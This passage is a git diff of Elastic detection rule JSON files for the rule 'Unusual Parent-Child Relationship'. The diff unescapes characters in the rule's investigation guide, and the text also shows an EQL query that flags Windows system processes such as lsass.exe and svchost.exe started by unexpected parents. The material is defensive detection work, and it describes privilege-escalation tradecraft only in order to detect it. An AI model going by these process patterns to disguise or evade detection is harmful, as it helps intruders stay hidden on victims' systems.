suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Unusual Parent-Child Relationship\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is parent-child relationships. These relationships can be used to baseline the typical behavior of the system and then alert on occurrences that don't comply with the baseline.\n\nThis rule uses this information to spot suspicious parent and child processes.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\nprocess.parent.name != null and\n (\n /* suspicious parent processes */\n (process.name:\"autochk.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"fontdrvhost.exe\", \"dwm.exe\") and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:(\"consent.exe\", \"RuntimeBroker.exe\", \"TiWorker.exe\") and not process.parent.name:\"svchost.exe\") or\n (process.name:\"SearchIndexer.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"SearchProtocolHost.exe\" and not process.parent.name:(\"SearchIndexer.exe\", \"dllhost.exe\")) or\n (process.name:\"dllhost.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"smss.exe\" and not process.parent.name:(\"System\", \"smss.exe\")) or\n (process.name:\"csrss.exe\" and not process.parent.name:(\"smss.exe\", \"svchost.exe\")) or\n (process.name:\"wininit.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:\"winlogon.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"lsass.exe\", \"LsaIso.exe\") and not process.parent.name:\"wininit.exe\") or\n (process.name:\"LogonUI.exe\" and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:\"services.exe\" and not process.parent.name:\"wininit.exe\") or\n (process.name:\"svchost.exe\" and not process.parent.name:(\"MsMpEng.exe\", \"services.exe\")) or\n (process.name:\"spoolsv.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"taskhost.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"taskhostw.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"userinit.exe\" and not process.parent.name:(\"dwm.exe\", \"winlogon.exe\")) or\n (process.name:(\"wmiprvse.exe\", \"wsmprovhost.exe\", \"winrshost.exe\") and not process.parent.name:\"svchost.exe\") or\n /* suspicious child processes */\n (process.parent.name:(\"SearchProtocolHost.exe\", \"taskhost.exe\", \"csrss.exe\") and not process.name:(\"werfault.exe\", \"wermgr.exe\", \"WerFaultSecure.exe\")) or\n (process.parent.name:\"autochk.exe\" and not process.name:(\"chkdsk.exe\", \"doskey.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"smss.exe\" and not process.name:(\"autochk.exe\", \"smss.exe\", \"csrss.exe\", \"wininit.exe\", \"winlogon.exe\", \"setupcl.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"wermgr.exe\" and not process.name:(\"WerFaultSecure.exe\", \"wermgr.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"conhost.exe\" and not process.name:(\"mscorsvw.exe\", \"wermgr.exe\", \"WerFault.exe\", \"WerFaultSecure.exe\"))\n )\n", "references": [ "https://github.com/sbousseaden/Slides/blob/master/Hunting%20MindMaps/PNG/Windows%20Processes%20TH.map.png", @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "35df0dd8-092d-4a83-88c1-5151a804f31b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_107.json b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_107.json index b334ed14fce..4fe5686901e 100644 --- a/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_107.json +++ b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_107.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Parent-Child Relationship", - "note": "## Triage and analysis\n\n### Investigating Unusual Parent-Child Relationship\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is parent-child relationships. These relationships can be used to baseline the typical behavior of the system and then alert on occurrences that don't comply with the baseline.\n\nThis rule uses this information to spot suspicious parent and child processes.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Unusual Parent-Child Relationship\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is parent-child relationships. These relationships can be used to baseline the typical behavior of the system and then alert on occurrences that don't comply with the baseline.\n\nThis rule uses this information to spot suspicious parent and child processes.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\nprocess.parent.name != null and\n (\n /* suspicious parent processes */\n (process.name:\"autochk.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"fontdrvhost.exe\", \"dwm.exe\") and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:(\"consent.exe\", \"RuntimeBroker.exe\", \"TiWorker.exe\") and not process.parent.name:\"svchost.exe\") or\n (process.name:\"SearchIndexer.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"SearchProtocolHost.exe\" and not process.parent.name:(\"SearchIndexer.exe\", \"dllhost.exe\")) or\n (process.name:\"dllhost.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"smss.exe\" and not process.parent.name:(\"System\", \"smss.exe\")) or\n (process.name:\"csrss.exe\" and not process.parent.name:(\"smss.exe\", \"svchost.exe\")) or\n (process.name:\"wininit.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:\"winlogon.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"lsass.exe\", \"LsaIso.exe\") and not process.parent.name:\"wininit.exe\") or\n (process.name:\"LogonUI.exe\" and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:\"services.exe\" and not process.parent.name:\"wininit.exe\") or\n (process.name:\"svchost.exe\" and not process.parent.name:(\"MsMpEng.exe\", \"services.exe\")) or\n (process.name:\"spoolsv.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"taskhost.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"taskhostw.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"userinit.exe\" and not process.parent.name:(\"dwm.exe\", \"winlogon.exe\")) or\n (process.name:(\"wmiprvse.exe\", \"wsmprovhost.exe\", \"winrshost.exe\") and not process.parent.name:\"svchost.exe\") or\n /* suspicious child processes */\n (process.parent.name:(\"SearchProtocolHost.exe\", \"taskhost.exe\", \"csrss.exe\") and not process.name:(\"werfault.exe\", \"wermgr.exe\", \"WerFaultSecure.exe\")) or\n (process.parent.name:\"autochk.exe\" and not process.name:(\"chkdsk.exe\", \"doskey.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"smss.exe\" and not process.name:(\"autochk.exe\", \"smss.exe\", \"csrss.exe\", \"wininit.exe\", \"winlogon.exe\", \"setupcl.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"wermgr.exe\" and not process.name:(\"WerFaultSecure.exe\", \"wermgr.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"conhost.exe\" and not process.name:(\"mscorsvw.exe\", \"wermgr.exe\", \"WerFault.exe\", \"WerFaultSecure.exe\"))\n )\n", "references": [ "https://github.com/sbousseaden/Slides/blob/master/Hunting%20MindMaps/PNG/Windows%20Processes%20TH.map.png", @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "35df0dd8-092d-4a83-88c1-5151a804f31b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_108.json b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_108.json index 3f565934c74..e5efe725871 100644 --- a/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_108.json +++ b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_108.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Parent-Child Relationship", - "note": "## Triage and analysis\n\n### Investigating Unusual Parent-Child Relationship\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is parent-child relationships. These relationships can be used to baseline the typical behavior of the system and then alert on occurrences that don't comply with the baseline.\n\nThis rule uses this information to spot suspicious parent and child processes.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Parent-Child Relationship\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is parent-child relationships. These relationships can be used to baseline the typical behavior of the system and then alert on occurrences that don't comply with the baseline.\n\nThis rule uses this information to spot suspicious parent and child processes.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\nprocess.parent.name != null and\n (\n /* suspicious parent processes */\n (process.name:\"autochk.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"fontdrvhost.exe\", \"dwm.exe\") and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:(\"consent.exe\", \"RuntimeBroker.exe\", \"TiWorker.exe\") and not process.parent.name:\"svchost.exe\") or\n (process.name:\"SearchIndexer.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"SearchProtocolHost.exe\" and not process.parent.name:(\"SearchIndexer.exe\", \"dllhost.exe\")) or\n (process.name:\"dllhost.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"smss.exe\" and not process.parent.name:(\"System\", \"smss.exe\")) or\n (process.name:\"csrss.exe\" and not process.parent.name:(\"smss.exe\", \"svchost.exe\")) or\n (process.name:\"wininit.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:\"winlogon.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"lsass.exe\", \"LsaIso.exe\") and not process.parent.name:\"wininit.exe\") or\n (process.name:\"LogonUI.exe\" and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:\"services.exe\" and not process.parent.name:\"wininit.exe\") or\n (process.name:\"svchost.exe\" and not process.parent.name:(\"MsMpEng.exe\", \"services.exe\")) or\n (process.name:\"spoolsv.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"taskhost.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"taskhostw.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"userinit.exe\" and not process.parent.name:(\"dwm.exe\", \"winlogon.exe\")) or\n (process.name:(\"wmiprvse.exe\", \"wsmprovhost.exe\", \"winrshost.exe\") and not process.parent.name:\"svchost.exe\") or\n 